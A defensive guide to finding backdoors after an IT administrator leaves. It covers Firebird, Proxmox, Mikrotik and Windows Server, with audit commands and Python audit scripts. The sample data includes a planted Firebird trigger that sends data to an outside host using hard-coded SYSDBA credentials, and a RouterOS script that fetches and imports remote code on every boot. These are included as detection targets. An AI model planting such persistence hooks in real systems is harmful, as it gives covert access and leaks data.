How to Detect and Remove Backdoors in Firebird DB, Proxmox, and Mikrotik Systems After IT Personnel Departure



When a skilled IT professional with system-level access leaves under questionable circumstances, the risk of hidden backdoors becomes significant. The combination of Firebird DB, Proxmox virtualization, and Mikrotik networking equipment presents multiple potential attack vectors that need thorough examination.

Firebird Database Backdoors:
Check for suspicious stored procedures or triggers that might exfiltrate data:


SELECT RDB$PROCEDURE_NAME, RDB$PROCEDURE_SOURCE 
FROM RDB$PROCEDURES 
WHERE RDB$SYSTEM_FLAG = 0 
AND RDB$PROCEDURE_SOURCE LIKE '%EXECUTE BLOCK%';

Proxmox Virtual Environment:
Audit all cron jobs and API tokens:


grep -r "pvesh" /etc/cron*
pvesh get /access/users --enabled 1 --full 1   # --full 1 also lists each user's API tokens
pvesh get /access/acl                          # which user or token holds which role on which path
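The listing above is only useful if someone actually reads it against a list of accounts that should exist. The following script is an added example (not part of the original article and not Proxmox project code) that does that comparison offline on the JSON `pvesh` can emit: it flags enabled users outside an allowlist, API tokens created without privilege separation or without an expiry, and any Administrator-class ACL held by an unexpected principal. The field names (`userid`, `enable`, `tokens`, `privsep`, `ugid`, `roleid`) are assumed to follow the `pvesh` JSON output; the sample data is constructed.

```python
"""Offline audit of Proxmox VE users, API tokens and ACLs.

Capture on a cluster node (as root), then run this script on the two files:
  pvesh get /access/users --full 1 --output-format json > users.json
  pvesh get /access/acl --output-format json > acl.json
  python3 pve_access_audit.py users.json acl.json
With no arguments it audits the constructed sample below.
"""
import json
import sys

ADMIN_ROLES = {"Administrator", "PVEAdmin"}    # roles that amount to full control
EXPECTED_USERS = {"root@pam"}                   # accounts you created yourself (assumption)


def owner_of(ugid: str) -> str:
    """'root@pam!monitoring' (a token id) -> 'root@pam'; plain user ids pass through."""
    return ugid.split("!", 1)[0]


def audit_access(users, acls, expected_users=EXPECTED_USERS):
    """Return (severity, message) tuples for anything outside the expected set.

    Assumed field names follow the pvesh JSON output: users carry userid, enable
    and (with --full 1) tokens=[{tokenid, privsep, expire, comment}]; ACL entries
    carry path, roleid, type, ugid, propagate.
    """
    findings = []
    for u in users:
        uid = u["userid"]
        if u.get("enable", 1) and uid not in expected_users:
            findings.append(("high", f"enabled user not in allowlist: {uid}"))
        for t in u.get("tokens", []):
            tid = f"{uid}!{t['tokenid']}"
            if not t.get("privsep", 1):
                # privsep=0: the token carries every permission of its owning user
                findings.append(("high", f"token without privilege separation: {tid}"))
            if not t.get("expire"):
                findings.append(("low", f"token never expires: {tid}"))
    for a in acls:
        if a["roleid"] in ADMIN_ROLES and owner_of(a["ugid"]) not in expected_users:
            findings.append(("high", f"{a['roleid']} on {a['path']} held by {a['type']} {a['ugid']}"))
    return findings


# Constructed sample data; not taken from a real cluster.
SAMPLE_USERS = [
    {"userid": "root@pam", "enable": 1, "expire": 0, "tokens": [
        {"tokenid": "monitoring", "privsep": 1, "expire": 0, "comment": "read-only poller"},
        {"tokenid": "mgmt", "privsep": 0, "expire": 0},
    ]},
    {"userid": "backup@pve", "enable": 1, "expire": 0},
    {"userid": "olduser@pve", "enable": 0, "expire": 0},
]
SAMPLE_ACLS = [
    {"path": "/", "roleid": "Administrator", "type": "user", "ugid": "root@pam", "propagate": 1},
    {"path": "/", "roleid": "Administrator", "type": "user", "ugid": "backup@pve", "propagate": 1},
    {"path": "/", "roleid": "PVEAuditor", "type": "token", "ugid": "root@pam!monitoring", "propagate": 1},
]


def main(argv):
    if len(argv) == 3:
        with open(argv[1]) as fh:
            users = json.load(fh)
        with open(argv[2]) as fh:
            acls = json.load(fh)
    else:
        users, acls = SAMPLE_USERS, SAMPLE_ACLS
    for severity, message in audit_access(users, acls):
        print(f"[{severity}] {message}")


if __name__ == "__main__":
    main(sys.argv)
```

On the sample this reports the `backup@pve` account twice (it is enabled and holds Administrator at `/`) and the `mgmt` token once as high, while the read-only `monitoring` token only gets a low note for its missing expiry. A disabled account such as `olduser@pve` is not reported; disabled users still belong in the review, but they cannot log in.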

For Mikrotik routers, check for hidden scripts or scheduled tasks:


/system script print
/system scheduler print
# review every accept rule in the input chain; a planted rule will not be commented "backdoor"
/ip firewall filter print detail where chain=input

On Windows Server guests, look for unusual scheduled tasks or WMI event subscriptions:


Get-ScheduledTask | Where-Object { $_.Author -notmatch "Microsoft|Administrator" }   # 2008 R2 lacks this cmdlet; use: schtasks /query /v /fo LIST
# WMI persistence needs a filter, a consumer and the binding between them; list all three
Get-WmiObject -Namespace root\subscription -Class __EventFilter
"__EventConsumer", "__FilterToConsumerBinding" | ForEach-Object { Get-WmiObject -Namespace root\subscription -Class $_ }

Consider using these tools for comprehensive scanning:

  • Lynis for Linux system auditing
  • OSSEC for host-based intrusion detection
  • Metasploit's post-exploitation modules for backdoor detection

Implement these security measures immediately:


-- Firebird DB (4.0 and later): routines run with the caller's privileges, not their creator's,
-- so a planted procedure cannot act as its (privileged) owner
ALTER DATABASE SET DEFAULT SQL SECURITY INVOKER;

# Proxmox: a read-only audit account (the built-in PVEAuditor role is an alternative to a custom role)
pveum role add Auditor --privs "Sys.Audit VM.Audit Datastore.Audit"
pveum user add auditor@pve
pveum passwd auditor@pve                       # prompts for the password; keeps it out of shell history
pveum acl modify / --users auditor@pve --roles Auditor

# Mikrotik: disable the plaintext services and keep only ssh and the TLS variants (www-ssl, api-ssl)
/ip service disable telnet,ftp,www,api

Set up centralized logging with ELK stack and configure alerts for:

  • Unusual database query patterns
  • Authentication attempts from unexpected locations
  • Changes to critical system files

When taking over IT systems from a disgruntled former employee, especially one with advanced programming skills, you're facing a multi-layered security challenge. The combination of Firebird DB, Windows Server 2008 R2 guests, Proxmox virtualization, and Mikrotik devices creates multiple potential attack surfaces.

First, implement these critical checks without service disruption:

# Check for unusual cron jobs or scheduled tasks
Get-ScheduledTask | Where-Object {$_.Author -notlike "*SYSTEM*" -and $_.Author -ne "Microsoft Corporation"}

# Audit SSH authorized_keys files (and check sshd_config for a non-default AuthorizedKeysFile or an AuthorizedKeysCommand)
find / -path /proc -prune -o -name "authorized_keys*" -print -exec ls -la {} \; -exec cat {} \; 2>/dev/null
grep -E "^\s*(AuthorizedKeysFile|AuthorizedKeysCommand)" /etc/ssh/sshd_config

# Verify Mikrotik user accounts
/user print detail where name!="admin"
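Dumping every authorized_keys file still leaves the hard part to the reader: deciding which keys are legitimate. The script below is an added example (not from the original article) that parses authorized_keys content, computes the same SHA256 fingerprint `ssh-keygen -lf` shows, and compares it with an allowlist of fingerprints you issued yourself; it also calls out `cert-authority` entries (one trusted CA key lets in any certificate it signs), forced commands, and keys with no `from=` restriction. The key blobs and file contents in the sample are constructed and are not usable keys.

```python
"""Audit OpenSSH authorized_keys contents against an allowlist of key fingerprints.

Usage on a host:  python3 audit_keys.py /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys
With no arguments it runs against the constructed sample below.
"""
import base64
import hashlib
import re
import sys

KEYTYPE_RE = re.compile(r"^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-\S+|sk-\S+)\s")


def fingerprint(blob_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint (the value ssh-keygen -lf prints)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def split_options(line: str):
    """Separate a leading option list (command="...",from="...") from the key itself."""
    if KEYTYPE_RE.match(line):
        return "", line
    quoted, i = False, 0
    while i < len(line):
        c = line[i]
        if c == "\\" and quoted:
            i += 1                       # skip the escaped character
        elif c == '"':
            quoted = not quoted
        elif c.isspace() and not quoted:
            return line[:i], line[i:].lstrip()
        i += 1
    return line, ""                      # options only, no key: treated as malformed


def parse_authorized_keys(text: str):
    """Yield (options, keytype, fingerprint, comment) for each key line."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        opts, rest = split_options(line)
        parts = rest.split(None, 2)
        if len(parts) < 2:
            continue
        try:
            fp = fingerprint(parts[1])
        except ValueError:               # not valid base64: cannot be a key you issued
            fp = "INVALID-BASE64"
        comment = parts[2] if len(parts) == 3 else ""
        yield opts, parts[0], fp, comment


def audit_keys(files: dict, known_fingerprints: set) -> list:
    """files: {path: contents}. Returns one finding dict per issue found."""
    findings = []
    for path, text in files.items():
        for opts, keytype, fp, comment in parse_authorized_keys(text):
            issues = []
            if fp not in known_fingerprints:
                issues.append(("high", "key not in allowlist"))
            if "cert-authority" in opts:
                issues.append(("high", "cert-authority: any certificate signed by this key logs in"))
            if "command=" in opts:
                issues.append(("medium", "forced command; read the script it runs"))
            if "from=" not in opts:
                issues.append(("low", "no from= source restriction"))
            for severity, reason in issues:
                findings.append({"path": path, "fingerprint": fp, "keytype": keytype,
                                 "comment": comment, "severity": severity, "reason": reason})
    return findings


def _fake_blob(seed: int) -> str:
    """Constructed ed25519-shaped blob for the demo; not a usable key."""
    body = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes((seed + i) % 256 for i in range(32))
    return base64.b64encode(body).decode()


KEY_A, KEY_B = _fake_blob(1), _fake_blob(77)
# Constructed sample files, not taken from any real host.
SAMPLE_FILES = {
    "/root/.ssh/authorized_keys":
        f"ssh-ed25519 {KEY_A} ops-laptop\n"
        f'command="/usr/local/bin/sync.sh",no-pty ssh-ed25519 {KEY_B} "backup job"\n',
    "/home/svc/.ssh/authorized_keys":
        f'cert-authority,from="10.0.0.0/8" ssh-ed25519 {KEY_A} internal-ca\n',
}
KNOWN_FINGERPRINTS = {fingerprint(KEY_A)}   # fingerprints of keys you issued yourself

if __name__ == "__main__":
    files = {p: open(p).read() for p in sys.argv[1:]} or SAMPLE_FILES
    for f in audit_keys(files, KNOWN_FINGERPRINTS):
        print(f"[{f['severity']}] {f['path']}: {f['reason']} ({f['fingerprint']} {f['comment']})")
```

The allowlist is the important input: build it from the keys your own staff can produce on demand, and treat everything else as unknown until someone claims it. A forced command is not evidence of compromise by itself, but the script it names has to be read, because that is where a "backup job" key can turn into a shell.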

For Firebird and SQL Server, examine these potential attack vectors:

-- Check for suspicious stored procedures
SELECT RDB$PROCEDURE_NAME FROM RDB$PROCEDURES 
WHERE RDB$SYSTEM_FLAG = 0 AND RDB$PROCEDURE_NAME LIKE '%shell%';

-- SQL Server trigger audit
SELECT name, type_desc, create_date, modify_date 
FROM sys.triggers
ORDER BY create_date DESC
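Both Firebird queries on this page (the `EXECUTE BLOCK` search earlier and the name match just above) look at one indicator each. The added example below, which is not from the original article and not Firebird project code, scores procedure and trigger sources on several indicators at once: `EXECUTE STATEMENT ... ON EXTERNAL` (which can push rows to another server), embedded credentials (`AS USER ... PASSWORD`), dynamic SQL, `EXECUTE BLOCK`, a suspicious name, and, for triggers, having no relation at all, which is how database-level triggers (ON CONNECT, ON TRANSACTION START and friends) appear in `RDB$TRIGGERS`. The two query strings are what you would run through a Firebird driver to obtain the rows; the rows used here are constructed.

```python
"""Triage Firebird stored procedures and triggers for exfiltration or persistence hooks."""
import re

# Queries to issue through a Firebird driver (e.g. firebird-driver) to obtain the rows.
# RDB$RELATION_NAME IS NULL identifies database-level triggers, which fire for every
# session (ON CONNECT, ON TRANSACTION START, ...) without touching any table.
PROCEDURE_QUERY = """
SELECT RDB$PROCEDURE_NAME, RDB$PROCEDURE_SOURCE
FROM RDB$PROCEDURES WHERE RDB$SYSTEM_FLAG = 0
"""
TRIGGER_QUERY = """
SELECT RDB$TRIGGER_NAME, RDB$RELATION_NAME, RDB$TRIGGER_SOURCE
FROM RDB$TRIGGERS WHERE RDB$SYSTEM_FLAG = 0
"""

# (regex, weight, explanation) applied case-insensitively to the routine source.
SOURCE_RULES = [
    (r"\bON\s+EXTERNAL\b", 5, "EXECUTE STATEMENT ... ON EXTERNAL: talks to another server"),
    (r"\bAS\s+USER\b|\bPASSWORD\b", 3, "embedded credentials in EXECUTE STATEMENT"),
    (r"\bEXECUTE\s+STATEMENT\b", 2, "dynamic SQL"),
    (r"\bEXECUTE\s+BLOCK\b", 1, "EXECUTE BLOCK inside stored code"),
]
NAME_RULE = (r"shell|cmd|backdoor|hidden|tmp", 1, "suspicious routine name")
DB_TRIGGER_WEIGHT = 3


def triage_routines(rows):
    """rows: dicts with kind ('PROCEDURE'/'TRIGGER'), name, relation (None for
    database-level triggers) and src. Returns [{name, kind, score, reasons}] for
    every routine that scored above zero, highest score first."""
    out = []
    for r in rows:
        score, reasons = 0, []
        src = r.get("src") or ""
        if r["kind"] == "TRIGGER" and r.get("relation") is None:
            score += DB_TRIGGER_WEIGHT
            reasons.append("database-level trigger: runs on every connection/transaction")
        for pattern, weight, why in SOURCE_RULES:
            if re.search(pattern, src, re.IGNORECASE):
                score += weight
                reasons.append(why)
        if re.search(NAME_RULE[0], r["name"], re.IGNORECASE):
            score += NAME_RULE[1]
            reasons.append(NAME_RULE[2])
        if score:
            out.append({"name": r["name"], "kind": r["kind"], "score": score, "reasons": reasons})
    return sorted(out, key=lambda x: -x["score"])


# Constructed sample rows (the shape a driver would hand back); not from a real database.
SAMPLE_ROWS = [
    {"kind": "TRIGGER", "name": "TR_ON_CONNECT", "relation": None,
     "src": "AS BEGIN EXECUTE STATEMENT 'INSERT INTO T VALUES (?)' (CURRENT_USER) "
            "ON EXTERNAL '203.0.113.9:/tmp/x.fdb' AS USER 'SYSDBA' PASSWORD 'masterkey'; END"},
    {"kind": "PROCEDURE", "name": "SP_MONTHLY_REPORT", "relation": None,
     "src": "AS BEGIN FOR SELECT ID FROM ORDERS INTO :ID DO SUSPEND; END"},
    {"kind": "TRIGGER", "name": "TR_ORDERS_BI", "relation": "ORDERS",
     "src": "AS BEGIN NEW.CREATED_AT = CURRENT_TIMESTAMP; END"},
]

if __name__ == "__main__":
    for hit in triage_routines(SAMPLE_ROWS):
        print(f"{hit['score']:>3}  {hit['kind']:<9} {hit['name']}")
        for why in hit["reasons"]:
            print(f"       - {why}")
```

Scores are a reading order, not a verdict: a legitimate replication trigger can score on `ON EXTERNAL` too. The point of the database-level trigger rule is that such a trigger never shows up in any table's DDL and runs as every connecting user, so it deserves a read regardless of its source.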

Given the former admin's reverse-engineering skills, scan for modified binaries:

# Using FLOSS to extract strings from suspicious binaries
floss -q --no-static-strings /path/to/suspected_binary

# List the shared libraries each ELF binary links. ldd can execute the inspected file's
# loader, so use readelf on anything untrusted, then diff the output against a clean host
readelf -d /usr/bin/* 2>/dev/null | grep -E "^File:|NEEDED"
# Proxmox is Debian-based: dpkg can also compare installed files with the package checksums
dpkg --verify
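Library lists only catch binaries whose dependencies changed. A stronger baseline on a Debian-based host such as Proxmox is the per-package `md5sums` file under `/var/lib/dpkg/info`, which is what `dpkg --verify` uses. The script below is an added example (not from the original article, not dpkg's own code) that rebuilds that comparison in plain Python so that the logic is visible: every file in the scanned directories is either owned by a package and matches its recorded checksum, owned and modified, or owned by no package at all, which is the class a dropped helper binary falls into. The demo tree it builds is constructed; on a real host pass `/` and the directories to scan.

```python
"""Compare installed files against the dpkg md5sums baseline (Debian, hence Proxmox).

On a host (as root):   python3 verify_binaries.py / /usr/bin /usr/sbin
With no arguments it builds a throwaway demo tree so that it also runs offline.
"""
import glob
import hashlib
import os
import sys
import tempfile

INFO_SUBDIR = "var/lib/dpkg/info"


def load_md5sums(root: str) -> dict:
    """Map 'usr/bin/ls' -> md5 hex from every <pkg>.md5sums file under root."""
    baseline = {}
    for path in glob.glob(os.path.join(root, INFO_SUBDIR, "*.md5sums")):
        with open(path, encoding="utf-8", errors="replace") as fh:
            for line in fh:
                digest, _, rel = line.rstrip("\n").partition("  ")   # "<md5>  <path>"
                if rel:
                    baseline[rel] = digest
    return baseline


def md5_of(path: str) -> str:
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_tree(root: str, scan_dirs) -> dict:
    """Report package-owned files whose md5 changed and files no package owns."""
    baseline = load_md5sums(root)
    report = {"modified": [], "unowned": []}
    for rel_dir in scan_dirs:
        top = os.path.join(root, rel_dir.strip("/"))
        for dirpath, _, names in os.walk(top):
            for name in names:
                full = os.path.join(dirpath, name)
                if os.path.islink(full) or not os.path.isfile(full):
                    continue
                rel = os.path.relpath(full, root)
                if rel not in baseline:
                    report["unowned"].append(rel)
                elif md5_of(full) != baseline[rel]:
                    report["modified"].append(rel)
    for key in report:
        report[key].sort()
    return report


def build_demo_root() -> str:
    """Constructed sample tree: one intact, one tampered and one unowned file."""
    root = tempfile.mkdtemp(prefix="dpkgdemo-")
    os.makedirs(os.path.join(root, INFO_SUBDIR))
    os.makedirs(os.path.join(root, "usr/bin"))
    owned = {"usr/bin/ls": b"ls-original", "usr/bin/cat": b"cat-original"}
    with open(os.path.join(root, INFO_SUBDIR, "coreutils.md5sums"), "w") as fh:
        for rel, content in owned.items():
            fh.write(f"{hashlib.md5(content).hexdigest()}  {rel}\n")
    for rel, content in owned.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(content)
    with open(os.path.join(root, "usr/bin/cat"), "wb") as fh:
        fh.write(b"cat-TAMPERED")                 # modified after install
    with open(os.path.join(root, "usr/bin/.sshd-helper"), "wb") as fh:
        fh.write(b"not from any package")         # unowned, hidden by a leading dot
    return root


if __name__ == "__main__":
    if len(sys.argv) >= 3:
        result = verify_tree(sys.argv[1], sys.argv[2:])
    else:
        result = verify_tree(build_demo_root(), ["usr/bin"])
    for key in ("modified", "unowned"):
        for rel in result[key]:
            print(f"{key}: /{rel}")
```

Two caveats apply on a real host. The checksums live on the same disk the former admin controlled, so treat a clean result as necessary rather than sufficient and compare against a freshly installed reference where you can; and files legitimately placed outside package management (local scripts, vendor tools) will show up as unowned, which is exactly why that list needs a human owner assigned to each entry.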

The virtualization layer requires special attention:

  • Audit all VMs for unusual network configurations
  • Check for modified qemu-server configuration files
  • Verify backup integrity checksums

For Mikrotik devices, implement these commands immediately:

/ip service disable telnet,ftp,www
# Rules are evaluated top-down: put the new rule first (place-before=0) and keep an accept
# rule for your own management subnet above it so you do not lock yourself out of Winbox
/ip firewall filter add chain=input protocol=tcp dst-port=8291 action=drop place-before=0
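The RouterOS `print` commands earlier on this page and the hardening commands just above both depend on someone reading the router's configuration as a whole. Mikrotik's `/export` produces that configuration as plain text, and the added example below (not from the original article and not Mikrotik code) parses such a dump offline and flags the usual persistence and exposure indicators: plaintext services left enabled, users outside an allowlist, scripts that fetch or import code or carry the `password` policy, scheduler entries that run at boot, and input-chain accept rules with no source restriction. The export line format (a `/path` line opening a section, `add`/`set` lines with `key=value` pairs, long lines wrapped with a trailing backslash) is an assumption about the format; the sample export is constructed.

```python
"""Audit a RouterOS '/export' dump for persistence and exposure indicators.

On the router:  /export file=audit   (then copy audit.rsc off the device)
Run:            python3 ros_audit.py audit.rsc
With no argument it audits the constructed sample below.
"""
import re
import sys

KV_RE = re.compile(r'([\w.-]+)=("(?:[^"\\]|\\.)*"|\S*)')
PLAINTEXT_SERVICES = {"telnet", "ftp", "www", "api"}
EXPECTED_USERS = {"admin"}                 # accounts you created yourself (assumption)
FETCH_MARKERS = ("/tool fetch", "/import", "/system reboot")


def _unquote(value: str) -> str:
    if len(value) >= 2 and value[0] == value[-1] == '"':
        return value[1:-1].replace('\\"', '"')
    return value


def parse_export(text: str):
    """Yield (section, verb, positional_args, kv_dict) per command line."""
    section, pending = "", ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        if line.endswith("\\"):            # wrapped line: join with the next one
            pending = line[:-1]
            continue
        pending = ""
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):           # '/ip service', '/system script', ...
            section = line
            continue
        verb, _, rest = line.partition(" ")
        positional, rest = [], rest.strip()
        while rest and "=" not in rest.split(None, 1)[0]:
            tok, _, rest = rest.partition(" ")
            positional.append(tok)
            rest = rest.strip()
        kv = {k: _unquote(v) for k, v in KV_RE.findall(rest)}
        yield section, verb, positional, kv


def audit_export(text: str, expected_users=EXPECTED_USERS):
    """Return (severity, message) tuples for the indicators described above."""
    findings = []
    for section, verb, pos, kv in parse_export(text):
        if section == "/ip service" and pos and pos[0] in PLAINTEXT_SERVICES \
                and kv.get("disabled", "no") == "no":
            findings.append(("medium", f"plaintext service enabled: {pos[0]}"))
        elif section == "/user" and verb == "add" and kv.get("name") not in expected_users:
            findings.append(("high", f"unexpected user: {kv.get('name')} (group={kv.get('group')})"))
        elif section == "/system script" and verb == "add":
            src = kv.get("source", "")
            reasons = [m for m in FETCH_MARKERS if m in src]
            if "password" in kv.get("policy", ""):
                reasons.append("policy includes password")
            if reasons:
                findings.append(("high", f"script {kv.get('name')}: " + ", ".join(reasons)))
        elif section == "/system scheduler" and kv.get("start-time") == "startup":
            findings.append(("medium", f"scheduler {kv.get('name')} runs at boot -> {kv.get('on-event')}"))
        elif section == "/ip firewall filter" and kv.get("chain") == "input" \
                and kv.get("action") == "accept" and "connection-state" not in kv \
                and not (kv.get("src-address") or kv.get("src-address-list") or kv.get("in-interface")):
            findings.append(("high", f"input accept without source restriction: dst-port={kv.get('dst-port', 'any')}"))
    return findings


# Constructed sample export; not taken from a real device.
SAMPLE_EXPORT = r'''# constructed sample
/ip service
set telnet disabled=no
set ftp disabled=yes
set www disabled=no
set ssh disabled=no port=22
set api disabled=no
/user
add name=admin group=full
add name=.svc group=full comment="do not remove"
/system script
add name=keepalive policy=ftp,reboot,read,write,policy,test,password \
    source="/tool fetch url=\"http://203.0.113.9/k.rsc\" dst-path=k.rsc; /import k.rsc"
/system scheduler
add interval=1d name=keepalive-run on-event=keepalive start-time=startup
/ip firewall filter
add action=accept chain=input connection-state=established,related
add action=accept chain=input comment="mgmt from jump host" dst-port=8291 protocol=tcp src-address=198.51.100.7
add action=accept chain=input dst-port=2222 protocol=tcp
add action=drop chain=input
'''

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_EXPORT
    for severity, message in audit_export(text):
        print(f"[{severity}] {message}")
```

The script-plus-scheduler pair in the sample is the pattern to recognise: a scheduler entry with `start-time=startup` re-runs a script on every reboot, and a script that fetches and imports a file re-creates whatever configuration was removed. Reviewing the two sections together, rather than one `print` at a time, is what makes that visible.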

Deploy these tools for continuous monitoring:

  • Osquery for endpoint visibility
  • Wazuh for log analysis
  • Rkhunter for rootkit detection

If you find multiple indicators of compromise, especially in:

  • Core system binaries
  • Database schemas
  • Authentication systems

then a complete rebuild becomes the safest option.